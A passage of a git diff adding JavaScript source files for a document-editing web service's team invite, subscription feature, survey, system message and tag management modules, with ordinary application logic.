'../../infrastructure/Modules.js' +import UserAuditLogHandler from '../User/UserAuditLogHandler.js' + +const rateLimiters = { + resendGroupInvite: new RateLimiter('resend-group-invite', { + points: 1, + duration: 60 * 60, + }), +} + +async function createInvite(req, res, next) { + const teamManagerId = SessionManager.getLoggedInUserId(req.session) + const subscription = req.entity + const email = EmailHelper.parseEmail(req.body.email) + if (!email) { + return res.status(422).json({ + error: { + code: 'invalid_email', + message: req.i18n.translate('invalid_email'), + }, + }) + } + + try { + const invitedUserData = await TeamInvitesHandler.promises.createInvite( + teamManagerId, + subscription, + email + ) + return res.json({ user: invitedUserData }) + } catch (err) { + if (err.alreadyInTeam) { + return res.status(400).json({ + error: { + code: 'user_already_added', + message: req.i18n.translate('user_already_added'), + }, + }) + } + if (err.limitReached) { + return res.status(400).json({ + error: { + code: 'group_full', + message: req.i18n.translate('group_full'), + }, + }) + } + } +} + +async function viewInvite(req, res, next) { + const { token } = req.params + const sessionUser = SessionManager.getSessionUser(req.session) + const userId = sessionUser?._id + const { invite, subscription } = + await TeamInvitesHandler.promises.getInvite(token) 
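  // getInvite (see TeamInvitesHandler below) throws NotFoundError when no
  // subscription holds this token; the invite field is still checked
  // defensively before rendering.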
+ + if (!invite) { + return ErrorController.notFound(req, res) + } + + const groupSSOActive = ( + await Modules.promises.hooks.fire('hasGroupSSOEnabled', subscription) + )?.[0] + + let validationStatus = new Map() + if (userId) { + const personalSubscription = + await SubscriptionLocator.promises.getUsersSubscription(userId) + + const hasIndividualRecurlySubscription = + personalSubscription && + personalSubscription.groupPlan === false && + personalSubscription.recurlyStatus?.state !== 'canceled' && + personalSubscription.recurlySubscription_id && + personalSubscription.recurlySubscription_id !== '' + + if (subscription?.managedUsersEnabled) { + if (!subscription.populated('groupPolicy')) { + // eslint-disable-next-line no-restricted-syntax + await subscription.populate('groupPolicy') + } + + const dbUser = await UserGetter.promises.getUser(userId) + + const isUserEnrolledInDifferentGroup = + ( + await Modules.promises.hooks.fire( + 'isUserEnrolledInDifferentGroup', + dbUser.enrollment, + subscription._id + ) + )?.[0] === true + if (isUserEnrolledInDifferentGroup) { + return HttpErrorHandler.forbidden( + req, + res, + 'User is already enrolled in a different subscription' + ) + } + + validationStatus = + await PermissionsManager.promises.getUserValidationStatus({ + user: dbUser, + groupPolicy: subscription.groupPolicy, + subscription, + }) + + let currentManagedUserAdminEmail + try { + currentManagedUserAdminEmail = + await SubscriptionLocator.promises.getAdminEmail(subscription._id) + } catch (err) { + logger.error({ err }, 'error getting subscription admin email') + } + + return res.render('subscriptions/team/invite-managed', { + inviterName: invite.inviterName, + inviteToken: invite.token, + expired: req.query.expired, + validationStatus: Object.fromEntries(validationStatus), + currentManagedUserAdminEmail, + groupSSOActive, + subscriptionId: subscription._id.toString(), + user: sessionUser, + }) + } else { + let currentManagedUserAdminEmail + try { + currentManagedUserAdminEmail = + await SubscriptionLocator.promises.getAdminEmail(req.managedBy) + } catch (err) { + logger.error({ err }, 'error getting subscription admin email') + } + + return res.render('subscriptions/team/invite', { + inviterName: invite.inviterName, + inviteToken: invite.token, + hasIndividualRecurlySubscription, + expired: req.query.expired, + userRestrictions: Array.from(req.userRestrictions || []), + currentManagedUserAdminEmail, + groupSSOActive, + subscriptionId: subscription._id.toString(), + user: sessionUser, + }) + } + } else { + const userByEmail = await UserGetter.promises.getUserByMainEmail( + invite.email + ) + + return res.render('subscriptions/team/invite_logged_out', { + inviterName: invite.inviterName, + inviteToken: invite.token, + appName: settings.appName, + accountExists: userByEmail != null, + emailAddress: invite.email, + user: { id: null }, + groupSSOActive, + }) + } +} + +async function viewInvites(req, res, next) { + const user = SessionManager.getSessionUser(req.session) + const groupSubscriptions = + await SubscriptionLocator.promises.getGroupsWithTeamInvitesEmail(user.email) + + const teamInvites = groupSubscriptions.map(groupSubscription => + groupSubscription.teamInvites.find(invite => invite.email === user.email) + ) + + return res.render('subscriptions/team/group-invites', { + teamInvites, + user, + }) +} + +async function acceptInvite(req, res, next) { + const { token } = req.params + const userId = SessionManager.getLoggedInUserId(req.session) + + const subscription = await 
TeamInvitesHandler.promises.acceptInvite( + token, + userId + ) + const groupSSOActive = ( + await Modules.promises.hooks.fire('hasGroupSSOEnabled', subscription) + )?.[0] + + try { + await UserAuditLogHandler.promises.addEntry( + userId, + 'accept-group-invitation', + userId, + req.ip, + { subscriptionId: subscription._id } + ) + } catch (e) { + logger.error( + { err: e, userId, subscriptionId: subscription._id }, + 'error adding audit log entry' + ) + } + + res.json({ groupSSOActive }) +} + +function revokeInvite(req, res, next) { + const subscription = req.entity + const email = EmailHelper.parseEmail(req.params.email) + const teamManagerId = SessionManager.getLoggedInUserId(req.session) + if (!email) { + return res.sendStatus(400) + } + + TeamInvitesHandler.revokeInvite( + teamManagerId, + subscription, + email, + function (err, results) { + if (err) { + return next(err) + } + res.sendStatus(204) + } + ) +} + +async function resendInvite(req, res, next) { + const { entity: subscription } = req + const userEmail = EmailHelper.parseEmail(req.body.email) + await subscription.populate('admin_id', ['email', 'first_name', 'last_name']) + + if (!userEmail) { + throw new Error('invalid email') + } + + const currentInvite = subscription.teamInvites.find( + invite => invite?.email === userEmail + ) + + if (!currentInvite) { + return await createInvite(req, res) + } + + const opts = { + to: userEmail, + admin: subscription.admin_id, + inviter: currentInvite.inviterName, + acceptInviteUrl: `${settings.siteUrl}/subscription/invites/${currentInvite.token}/`, + reminder: true, + } + + try { + await rateLimiters.resendGroupInvite.consume(userEmail, 1, { + method: 'email', + }) + + const existingUser = await UserGetter.promises.getUserByAnyEmail(userEmail) + + let emailTemplate + if (subscription.managedUsersEnabled) { + if (existingUser) { + emailTemplate = 'verifyEmailToJoinManagedUsers' + } else { + emailTemplate = 'inviteNewUserToJoinManagedUsers' + } + } else { + emailTemplate = 'verifyEmailToJoinTeam' + } + + EmailHandler.sendDeferredEmail(emailTemplate, opts) + } catch (err) { + if (err?.remainingPoints === 0) { + return res.sendStatus(429) + } else { + throw OError.tag(err, 'Failed to resend group invite email') + } + } + + return res.status(200).json({ success: true }) +} + +export default { + createInvite: expressify(createInvite), + viewInvite: expressify(viewInvite), + viewInvites: expressify(viewInvites), + acceptInvite: expressify(acceptInvite), + revokeInvite, + resendInvite: expressify(resendInvite), +} diff --git a/services/web/app/src/Features/Subscription/TeamInvitesHandler.js b/services/web/app/src/Features/Subscription/TeamInvitesHandler.js new file mode 100644 index 0000000..45a0495 --- /dev/null +++ b/services/web/app/src/Features/Subscription/TeamInvitesHandler.js @@ -0,0 +1,370 @@ +const logger = require('@overleaf/logger') +const crypto = require('crypto') + +const settings = require('@overleaf/settings') +const Modules = require('../../infrastructure/Modules') +const { ObjectId } = require('mongodb-legacy') + +const { Subscription } = require('../../models/Subscription') +const { SSOConfig } = require('../../models/SSOConfig') + +const UserGetter = require('../User/UserGetter') +const SubscriptionLocator = require('./SubscriptionLocator') +const SubscriptionUpdater = require('./SubscriptionUpdater') +const LimitationsManager = require('./LimitationsManager') + +const EmailHandler = require('../Email/EmailHandler') +const EmailHelper = require('../Helpers/EmailHelper') + 
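// Invite lifecycle implemented below: createInvite stores a random
// 32-byte hex token on the subscription and emails it to the invitee,
// acceptInvite resolves the token and adds the user to the group, and
// revokeInvite removes the invite together with any dashboard
// notification.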
+const Errors = require('../Errors/Errors') +const { + callbackify, + callbackifyMultiResult, +} = require('@overleaf/promise-utils') +const NotificationsBuilder = require('../Notifications/NotificationsBuilder') + +async function getInvite(token) { + const subscription = await Subscription.findOne({ + 'teamInvites.token': token, + }) + if (!subscription) { + throw new Errors.NotFoundError('team not found') + } + + const invite = subscription.teamInvites.find(i => i.token === token) + return { invite, subscription } +} + +async function createInvite(teamManagerId, subscription, email) { + email = EmailHelper.parseEmail(email) + if (!email) { + throw new Error('invalid email') + } + const teamManager = await UserGetter.promises.getUser(teamManagerId) + + await _removeLegacyInvite(subscription.id, email) + return _createInvite(subscription, email, teamManager) +} + +async function importInvite(subscription, inviterName, email, token, sentAt) { + const { possible, reason } = await _checkIfInviteIsPossible( + subscription, + email + ) + if (!possible) { + throw reason + } + subscription.teamInvites.push({ + email, + inviterName, + token, + sentAt, + }) + + return subscription.save() +} + +async function acceptInvite(token, userId) { + const { invite, subscription } = await getInvite(token) + if (!invite) { + throw new Errors.NotFoundError('invite not found') + } + + await SubscriptionUpdater.promises.addUserToGroup(subscription._id, userId) + + if (subscription.managedUsersEnabled) { + await Modules.promises.hooks.fire( + 'enrollInManagedSubscription', + userId, + subscription + ) + } + if (subscription.ssoConfig) { + const ssoConfig = await SSOConfig.findById( + subscription.ssoConfig._id || subscription.ssoConfig + ) + if (ssoConfig?.enabled) { + await Modules.promises.hooks.fire( + 'scheduleGroupSSOReminder', + userId, + subscription._id + ) + } + } + + await _removeInviteFromTeam(subscription.id, invite.email) + + await NotificationsBuilder.promises + .groupInvitation(userId, subscription._id, false) + .read() + + return subscription +} + +async function revokeInvite(teamManagerId, subscription, email) { + email = EmailHelper.parseEmail(email) + + if (!email) { + throw new Error('invalid email') + } + + await _removeInviteFromTeam(subscription.id, email) + + // Remove group invitation dashboard notification if invitation is revoked before + // the invited user accepted the group invitation + const user = await UserGetter.promises.getUserByAnyEmail(email) + if (user) { + await NotificationsBuilder.promises + .groupInvitation(user._id, subscription._id, false) + .read() + } +} + +// Legacy method to allow a user to receive a confirmation email if their +// email is in Subscription.invited_emails when they join. We'll remove this +// after a short while. 
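// Subscription.invited_emails is a plain list of addresses, unlike
// teamInvites entries, which are objects of the shape
// { email, inviterName, token, sentAt } (see importInvite below).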
+async function createTeamInvitesForLegacyInvitedEmail(email) { + const teams = + await SubscriptionLocator.promises.getGroupsWithEmailInvite(email) + return Promise.all( + teams.map(team => createInvite(team.admin_id, team, email)) + ) +} + +async function _createInvite(subscription, email, inviter) { + const { possible, reason } = await _checkIfInviteIsPossible( + subscription, + email + ) + + if (!possible) { + throw reason + } + + // don't send invites when inviting self; add user directly to the group + const isInvitingSelf = inviter.emails.some( + emailData => emailData.email === email + ) + if (isInvitingSelf) { + await SubscriptionUpdater.promises.addUserToGroup( + subscription._id, + inviter._id + ) + + // legacy: remove any invite that might have been created in the past + await _removeInviteFromTeam(subscription._id, email) + + try { + if (subscription.ssoConfig) { + const ssoConfig = await SSOConfig.findById( + subscription.ssoConfig._id || subscription.ssoConfig + ) + if (ssoConfig?.enabled) { + await Modules.promises.hooks.fire( + 'sendGroupSSOReminder', + inviter._id, + subscription._id + ) + } + } + } catch (error) { + logger.error( + { err: error, userId: inviter._id, subscriptionId: subscription._id }, + 'Failed to schedule Group SSO invite for group admin' + ) + } + + return { + email: inviter.email, + first_name: inviter.first_name, + last_name: inviter.last_name, + invite: false, + } + } + + const inviterName = _getInviterName(inviter) + let invite = subscription.teamInvites.find(invite => invite.email === email) + + if (invite) { + invite = invite.toObject() + invite.sentAt = new Date() + } else { + invite = { + email, + inviterName, + token: crypto.randomBytes(32).toString('hex'), + sentAt: new Date(), + } + subscription.teamInvites.push(invite) + } + + try { + await _sendNotificationToExistingUser( + subscription, + email, + invite, + subscription.managedUsersEnabled + ) + } catch (err) { + logger.error( + { err }, + 'Failed to send notification to existing user when creating group invitation' + ) + } + + await subscription.save() + + if (subscription.managedUsersEnabled) { + let admin = {} + try { + admin = await SubscriptionLocator.promises.getAdminEmailAndName( + subscription._id + ) + } catch (err) { + logger.error({ err }, 'error getting subscription admin email and name') + } + + const user = await UserGetter.promises.getUserByAnyEmail(email) + + const opts = { + to: email, + admin, + inviter, + acceptInviteUrl: `${settings.siteUrl}/subscription/invites/${invite.token}/`, + appName: settings.appName, + } + + if (user) { + await EmailHandler.promises.sendEmail( + 'verifyEmailToJoinManagedUsers', + opts + ) + } else { + await EmailHandler.promises.sendEmail( + 'inviteNewUserToJoinManagedUsers', + opts + ) + } + } else { + const opts = { + to: email, + inviter, + acceptInviteUrl: `${settings.siteUrl}/subscription/invites/${invite.token}/`, + appName: settings.appName, + } + + await EmailHandler.promises.sendEmail('verifyEmailToJoinTeam', opts) + } + + Object.assign(invite, { invite: true }) + return invite +} + +async function _removeInviteFromTeam(subscriptionId, email, callback) { + const searchConditions = { _id: new ObjectId(subscriptionId.toString()) } + const removeInvite = { $pull: { teamInvites: { email } } } + + await Subscription.updateOne(searchConditions, removeInvite) + await _removeLegacyInvite(subscriptionId, email) +} + +async function _sendNotificationToExistingUser( + subscription, + email, + invite, + managedUsersEnabled +) { + const user = 
await UserGetter.promises.getUserByMainEmail(email) + + if (!user) { + return + } + + await NotificationsBuilder.promises + .groupInvitation( + user._id.toString(), + subscription._id.toString(), + managedUsersEnabled + ) + .create(invite) +} + +async function _removeLegacyInvite(subscriptionId, email) { + await Subscription.updateOne( + { + _id: new ObjectId(subscriptionId.toString()), + }, + { + $pull: { + invited_emails: email, + }, + } + ) +} + +async function _checkIfInviteIsPossible(subscription, email) { + if (!subscription.groupPlan) { + logger.debug( + { subscriptionId: subscription.id }, + 'can not add members to a subscription that is not in a group plan' + ) + return { possible: false, reason: { wrongPlan: true } } + } + + if (LimitationsManager.teamHasReachedMemberLimit(subscription)) { + logger.debug( + { subscriptionId: subscription.id }, + 'team has reached member limit' + ) + return { possible: false, reason: { limitReached: true } } + } + + const existingUser = await UserGetter.promises.getUserByAnyEmail(email) + if (!existingUser) { + return { possible: true } + } + + const existingMember = subscription.member_ids.find( + memberId => memberId.toString() === existingUser._id.toString() + ) + + if (existingMember) { + logger.debug( + { subscriptionId: subscription.id, email }, + 'user already in team' + ) + return { possible: false, reason: { alreadyInTeam: true } } + } else { + return { possible: true } + } +} + +function _getInviterName(inviter) { + let inviterName + if (inviter.first_name && inviter.last_name) { + inviterName = `${inviter.first_name} ${inviter.last_name} (${inviter.email})` + } else { + inviterName = inviter.email + } + + return inviterName +} + +module.exports = { + getInvite: callbackifyMultiResult(getInvite, ['invite', 'subscription']), + createInvite: callbackify(createInvite), + importInvite: callbackify(importInvite), + acceptInvite: callbackify(acceptInvite), + revokeInvite: callbackify(revokeInvite), + createTeamInvitesForLegacyInvitedEmail: callbackify( + createTeamInvitesForLegacyInvitedEmail + ), + promises: { + getInvite, + createInvite, + importInvite, + acceptInvite, + revokeInvite, + createTeamInvitesForLegacyInvitedEmail, + }, +} diff --git a/services/web/app/src/Features/Subscription/UserFeaturesUpdater.js b/services/web/app/src/Features/Subscription/UserFeaturesUpdater.js new file mode 100644 index 0000000..e29eb8e --- /dev/null +++ b/services/web/app/src/Features/Subscription/UserFeaturesUpdater.js @@ -0,0 +1,61 @@ +const { User } = require('../../models/User') +const { callbackify } = require('util') +const Settings = require('@overleaf/settings') + +function _featuresChanged(newFeatures, featuresBefore) { + for (const feature in newFeatures) { + if (featuresBefore[feature] !== newFeatures[feature]) { + return true + } + } + return false +} + +async function updateFeatures(userId, features) { + const update = { + featuresUpdatedAt: new Date(), + } + // record the system-wide features epoch, if defined + if (Settings.featuresEpoch) { + update.featuresEpoch = Settings.featuresEpoch + } + for (const key in features) { + const value = features[key] + update[`features.${key}`] = value + } + const docBeforeUpdate = await User.findByIdAndUpdate(userId, update).exec() + let featuresChanged = false + if (docBeforeUpdate) { + featuresChanged = _featuresChanged(features, docBeforeUpdate.features) + } + + return { features, featuresChanged } +} + +async function overrideFeatures(userId, features) { + const update = { features, featuresUpdatedAt: 
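    // Unlike updateFeatures above, which $sets individual features.<key>
    // paths, passing the whole features object here replaces the user's
    // feature set in a single update.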
new Date() } + const docBeforeUpdate = await User.findByIdAndUpdate(userId, update).exec() + let featuresChanged = false + if (docBeforeUpdate) { + featuresChanged = _featuresChanged(features, docBeforeUpdate.features) + } + return featuresChanged +} + +async function createFeaturesOverride(userId, featuresOverride) { + return await User.updateOne( + { _id: userId }, + { $push: { featuresOverrides: featuresOverride } } + ).exec() +} + +module.exports = { + updateFeatures: callbackify(updateFeatures), + overrideFeatures: callbackify(overrideFeatures), + createFeaturesOverride: callbackify(createFeaturesOverride), + promises: { + updateFeatures, + overrideFeatures, + createFeaturesOverride, + }, +} diff --git a/services/web/app/src/Features/Subscription/V1SubscriptionManager.js b/services/web/app/src/Features/Subscription/V1SubscriptionManager.js new file mode 100644 index 0000000..6a852eb --- /dev/null +++ b/services/web/app/src/Features/Subscription/V1SubscriptionManager.js @@ -0,0 +1,123 @@ +let V1SubscriptionManager +const UserGetter = require('../User/UserGetter') +const request = require('requestretry') +const settings = require('@overleaf/settings') +const { V1ConnectionError, NotFoundError } = require('../Errors/Errors') +const { promisifyAll } = require('@overleaf/promise-utils') + +module.exports = V1SubscriptionManager = { + cancelV1Subscription(userId, callback) { + V1SubscriptionManager._v1Request( + userId, + { + method: 'DELETE', + url(v1Id) { + return `/api/v1/overleaf/users/${v1Id}/subscription` + }, + }, + callback + ) + }, + + v1IdForUser(userId, callback) { + UserGetter.getUser(userId, { 'overleaf.id': 1 }, function (err, user) { + if (err) { + return callback(err) + } + const v1Id = user?.overleaf?.id + callback(null, v1Id) + }) + }, + + // v1 accounts created before migration to v2 had github and mendeley for free + // but these are now paid-for features for new accounts (v1id > cutoff) + getGrandfatheredFeaturesForV1User(v1Id) { + const cutoff = settings.v1GrandfatheredFeaturesUidCutoff + if (!cutoff) { + return {} + } + if (!v1Id) { + return {} + } + + if (v1Id < cutoff) { + return settings.v1GrandfatheredFeatures || {} + } else { + return {} + } + }, + + _v1Request(userId, options, callback) { + if (!settings.apis.v1.url) { + return callback(null, null) + } + + V1SubscriptionManager.v1IdForUser(userId, function (err, v1Id) { + if (err) { + return callback(err) + } + if (!v1Id) { + return callback(null, null, null) + } + const url = options.url(v1Id) + const requestOptions = { + baseUrl: settings.apis.v1.url, + url, + method: options.method, + auth: { + user: settings.apis.v1.user, + pass: settings.apis.v1.pass, + sendImmediately: true, + }, + json: true, + timeout: settings.apis.v1.timeout, + } + if (options.method === 'GET') { + requestOptions.maxAttempts = 3 + requestOptions.retryDelay = 500 + } else { + requestOptions.maxAttempts = 0 + } + request(requestOptions, function (error, response, body) { + if (error) { + return callback( + new V1ConnectionError({ + message: 'no v1 connection', + info: { url }, + }).withCause(error) + ) + } + if (response && response.statusCode >= 500) { + return callback( + new V1ConnectionError({ + message: 'error from v1', + info: { + status: response.statusCode, + body, + }, + }) + ) + } + if (response.statusCode >= 200 && response.statusCode < 300) { + return callback(null, body, v1Id) + } else { + if (response.statusCode === 404) { + return callback(new NotFoundError(`v1 user not found: ${userId}`)) + } else { + return callback( + 
new Error( + `non-success code from v1: ${response.statusCode} ${ + options.method + } ${options.url(v1Id)}` + ) + ) + } + } + }) + }) + }, +} + +module.exports.promises = promisifyAll(module.exports, { + without: ['getGrandfatheredFeaturesForV1User'], +}) diff --git a/services/web/app/src/Features/Subscription/types.ts b/services/web/app/src/Features/Subscription/types.ts new file mode 100644 index 0000000..59453ac --- /dev/null +++ b/services/web/app/src/Features/Subscription/types.ts @@ -0,0 +1,6 @@ +import { + PaypalPaymentMethod, + CreditCardPaymentMethod, +} from './PaymentProviderEntities' + +export type PaymentMethod = PaypalPaymentMethod | CreditCardPaymentMethod diff --git a/services/web/app/src/Features/Survey/SurveyCache.mjs b/services/web/app/src/Features/Survey/SurveyCache.mjs new file mode 100644 index 0000000..28b43fe --- /dev/null +++ b/services/web/app/src/Features/Survey/SurveyCache.mjs @@ -0,0 +1,25 @@ +import SurveyManager from './SurveyManager.js' +import { Survey } from '../../models/Survey.js' +import { CacheLoader } from 'cache-flow' + +class SurveyCache extends CacheLoader { + constructor() { + super('survey', { + expirationTime: 60, // 1min in seconds + }) + } + + async load() { + return await SurveyManager.getSurvey() + } + + serialize(value) { + return value?.toObject() + } + + deserialize(value) { + return new Survey(value) + } +} + +export default new SurveyCache() diff --git a/services/web/app/src/Features/Survey/SurveyHandler.mjs b/services/web/app/src/Features/Survey/SurveyHandler.mjs new file mode 100644 index 0000000..009bc12 --- /dev/null +++ b/services/web/app/src/Features/Survey/SurveyHandler.mjs @@ -0,0 +1,64 @@ +// ts-check +import crypto from 'node:crypto' + +import SurveyCache from './SurveyCache.mjs' +import SubscriptionLocator from '../Subscription/SubscriptionLocator.js' +import { callbackify } from '@overleaf/promise-utils' + +/** + * @import { Survey } from '../../../../types/project/dashboard/survey' + */ + +/** + * determines if there is a survey to show, given current surveys and rollout percentages + * uses userId in computation, to ensure that rollout groups always contain same users + * @param {string} userId + * @returns {Promise<Survey | undefined>} + */ +async function getSurvey(userId) { + const survey = await SurveyCache.get(true) + if (survey) { + if (survey.options?.hasRecurlyGroupSubscription) { + const hasRecurlyGroupSubscription = + await SubscriptionLocator.promises.hasRecurlyGroupSubscription(userId) + if (!hasRecurlyGroupSubscription) { + return + } + } + + const { name, preText, linkText, url, options } = survey?.toObject() || {} + // default to full rollout for backwards compatibility + const rolloutPercentage = options?.rolloutPercentage || 100 + if (!_userInRolloutPercentile(userId, name, rolloutPercentage)) { + return + } + + return { name, preText, linkText, url } + } +} + +function _userRolloutPercentile(userId, surveyName) { + const hash = crypto + .createHash('md5') + .update(userId + surveyName) + .digest('hex') + const hashPrefix = hash.substring(0, 8) + return Math.floor( + ((parseInt(hashPrefix, 16) % 0xffffffff) / 0xffffffff) * 100 + ) +} + +function _userInRolloutPercentile(userId, surveyName, rolloutPercentage) { + if (rolloutPercentage === 100) { + return true + } + const userPercentile = _userRolloutPercentile(userId, surveyName) + return userPercentile < rolloutPercentage +} + +export default { + getSurvey: callbackify(getSurvey), + promises: { + getSurvey, + }, +} diff --git 
a/services/web/app/src/Features/Survey/SurveyManager.js b/services/web/app/src/Features/Survey/SurveyManager.js new file mode 100644 index 0000000..abaee90 --- /dev/null +++ b/services/web/app/src/Features/Survey/SurveyManager.js @@ -0,0 +1,37 @@ +const { Survey } = require('../../models/Survey') +const OError = require('@overleaf/o-error') + +async function getSurvey() { + try { + return await Survey.findOne().exec() + } catch (error) { + throw OError.tag(error, 'Failed to get survey') + } +} + +async function updateSurvey({ name, preText, linkText, url, options }) { + let survey = await getSurvey() + if (!survey) { + survey = new Survey() + } + survey.name = name + survey.preText = preText + survey.linkText = linkText + survey.url = url + survey.options = options + await survey.save() + return survey +} + +async function deleteSurvey() { + const survey = await getSurvey() + if (survey) { + await survey.deleteOne() + } +} + +module.exports = { + getSurvey, + updateSurvey, + deleteSurvey, +} diff --git a/services/web/app/src/Features/SystemMessages/SystemMessageController.js b/services/web/app/src/Features/SystemMessages/SystemMessageController.js new file mode 100644 index 0000000..41339aa --- /dev/null +++ b/services/web/app/src/Features/SystemMessages/SystemMessageController.js @@ -0,0 +1,27 @@ +const Settings = require('@overleaf/settings') +const SessionManager = require('../Authentication/SessionManager') +const SystemMessageManager = require('./SystemMessageManager') + +const ProjectController = { + getMessages(req, res, next) { + if (!SessionManager.isUserLoggedIn(req.session)) { + // gracefully handle requests from anonymous users + return res.json([]) + } + let messages = SystemMessageManager.getMessages() + + if (!Settings.siteIsOpen) { + // Override all messages with notice for admins when site is closed. + messages = [ + { + content: + 'SITE IS CLOSED TO PUBLIC. OPEN ONLY FOR SITE ADMINS. 
DO NOT EDIT PROJECTS.', + _id: 'protected', // prevents hiding message in frontend + }, + ] + } + res.json(messages || []) + }, +} + +module.exports = ProjectController diff --git a/services/web/app/src/Features/SystemMessages/SystemMessageManager.js b/services/web/app/src/Features/SystemMessages/SystemMessageManager.js new file mode 100644 index 0000000..96a6676 --- /dev/null +++ b/services/web/app/src/Features/SystemMessages/SystemMessageManager.js @@ -0,0 +1,59 @@ +const { SystemMessage } = require('../../models/SystemMessage') +const { + addRequiredCleanupHandlerBeforeDrainingConnections, +} = require('../../infrastructure/GracefulShutdown') +const { callbackifyAll } = require('@overleaf/promise-utils') +const logger = require('@overleaf/logger') + +const SystemMessageManager = { + _cachedMessages: [], + + getMessages() { + return this._cachedMessages + }, + + async getMessagesFromDB() { + return await SystemMessage.find({}).exec() + }, + + async clearMessages() { + await SystemMessage.deleteMany({}).exec() + await this.refreshCache() + }, + + async createMessage(content) { + const message = new SystemMessage({ content }) + await message.save() + await this.refreshCache() + }, + + async refreshCache() { + this._cachedMessages = await this.getMessagesFromDB() + }, + + refreshCacheInBackground() { + this.refreshCache().catch(err => { + logger.warn({ err }, 'failed to refresh system messages cache') + }) + }, +} + +const CACHE_TIMEOUT = 10 * 1000 * (Math.random() + 2) // 20-30 seconds +SystemMessageManager.refreshCacheInBackground() +const intervalHandle = setInterval( + () => SystemMessageManager.refreshCacheInBackground(), + CACHE_TIMEOUT +) + +addRequiredCleanupHandlerBeforeDrainingConnections( + 'update system messages', + () => { + clearInterval(intervalHandle) + } +) + +module.exports = { + getMessages: SystemMessageManager.getMessages.bind(SystemMessageManager), + ...callbackifyAll(SystemMessageManager, { without: ['getMessages'] }), + promises: SystemMessageManager, +} diff --git a/services/web/app/src/Features/Tags/TagsController.mjs b/services/web/app/src/Features/Tags/TagsController.mjs new file mode 100644 index 0000000..807e48a --- /dev/null +++ b/services/web/app/src/Features/Tags/TagsController.mjs @@ -0,0 +1,102 @@ +import TagsHandler from './TagsHandler.js' +import SessionManager from '../Authentication/SessionManager.js' +import Errors from '../Errors/Errors.js' +import { expressify } from '@overleaf/promise-utils' + +async function _getTags(userId, _req, res) { + if (!userId) { + throw new Errors.NotFoundError() + } + const allTags = await TagsHandler.promises.getAllTags(userId) + res.json(allTags) +} + +async function apiGetAllTags(req, res) { + const { userId } = req.params + await _getTags(userId, req, res) +} + +async function getAllTags(req, res) { + const userId = SessionManager.getLoggedInUserId(req.session) + await _getTags(userId, req, res) +} + +async function createTag(req, res) { + const userId = SessionManager.getLoggedInUserId(req.session) + const { name, color } = req.body + const tag = await TagsHandler.promises.createTag(userId, name, color) + res.json(tag) +} + +async function addProjectToTag(req, res) { + const userId = SessionManager.getLoggedInUserId(req.session) + const { tagId, projectId } = req.params + await TagsHandler.promises.addProjectToTag(userId, tagId, projectId) + res.status(204).end() +} + +async function addProjectsToTag(req, res) { + const userId = SessionManager.getLoggedInUserId(req.session) + const { tagId } = req.params + const { 
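  // Bulk variant of addProjectToTag: the handler applies $addToSet with
  // $each (see TagsHandler.addProjectsToTag), so repeated ids in the
  // request body are deduplicated server-side.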
projectIds } = req.body + await TagsHandler.promises.addProjectsToTag(userId, tagId, projectIds) + res.status(204).end() +} + +async function removeProjectFromTag(req, res, next) { + const userId = SessionManager.getLoggedInUserId(req.session) + const { tagId, projectId } = req.params + await TagsHandler.promises.removeProjectFromTag(userId, tagId, projectId) + res.status(204).end() +} + +async function removeProjectsFromTag(req, res, next) { + const userId = SessionManager.getLoggedInUserId(req.session) + const { tagId } = req.params + const { projectIds } = req.body + await TagsHandler.promises.removeProjectsFromTag(userId, tagId, projectIds) + res.status(204).end() +} + +async function deleteTag(req, res) { + const userId = SessionManager.getLoggedInUserId(req.session) + const { tagId } = req.params + await TagsHandler.promises.deleteTag(userId, tagId) + res.status(204).end() +} + +async function renameTag(req, res) { + const userId = SessionManager.getLoggedInUserId(req.session) + const { tagId } = req.params + const name = req.body?.name + if (!name) { + return res.status(400).end() + } + await TagsHandler.promises.renameTag(userId, tagId, name) + res.status(204).end() +} + +async function editTag(req, res) { + const userId = SessionManager.getLoggedInUserId(req.session) + const { tagId } = req.params + const name = req.body?.name + const color = req.body?.color + if (!name) { + return res.status(400).end() + } + await TagsHandler.promises.editTag(userId, tagId, name, color) + res.status(204).end() +} + +export default { + apiGetAllTags: expressify(apiGetAllTags), + getAllTags: expressify(getAllTags), + createTag: expressify(createTag), + addProjectToTag: expressify(addProjectToTag), + addProjectsToTag: expressify(addProjectsToTag), + removeProjectFromTag: expressify(removeProjectFromTag), + removeProjectsFromTag: expressify(removeProjectsFromTag), + deleteTag: expressify(deleteTag), + renameTag: expressify(renameTag), + editTag: expressify(editTag), +} diff --git a/services/web/app/src/Features/Tags/TagsHandler.js b/services/web/app/src/Features/Tags/TagsHandler.js new file mode 100644 index 0000000..65314c8 --- /dev/null +++ b/services/web/app/src/Features/Tags/TagsHandler.js @@ -0,0 +1,167 @@ +const { Tag } = require('../../models/Tag') +const { callbackify } = require('@overleaf/promise-utils') + +const MAX_TAG_LENGTH = 50 + +async function getAllTags(userId) { + return Tag.find({ user_id: userId }) +} + +async function countTagsForProject(userId, projectId) { + return Tag.countDocuments({ user_id: userId, project_ids: projectId }) +} + +async function getTagsForProject(userId, projectId) { + return Tag.find({ user_id: userId, project_ids: projectId }, '-project_ids') +} + +async function createTag(userId, name, color, options = {}) { + if (name.length > MAX_TAG_LENGTH) { + if (options.truncate) { + name = name.slice(0, MAX_TAG_LENGTH) + } else { + throw new Error('Exceeded max tag length') + } + } + try { + return await Tag.create({ user_id: userId, name, color }) + } catch (error) { + // on duplicate key error return existing tag + if (error && error.code === 11000) { + return Tag.findOne({ user_id: userId, name }) + } + throw error + } +} + +async function renameTag(userId, tagId, name) { + if (name.length > MAX_TAG_LENGTH) { + throw new Error('Exceeded max tag length') + } + return Tag.updateOne( + { + _id: tagId, + user_id: userId, + }, + { + $set: { + name, + }, + } + ) +} + +async function editTag(userId, tagId, name, color) { + if (name.length > MAX_TAG_LENGTH) { + throw 
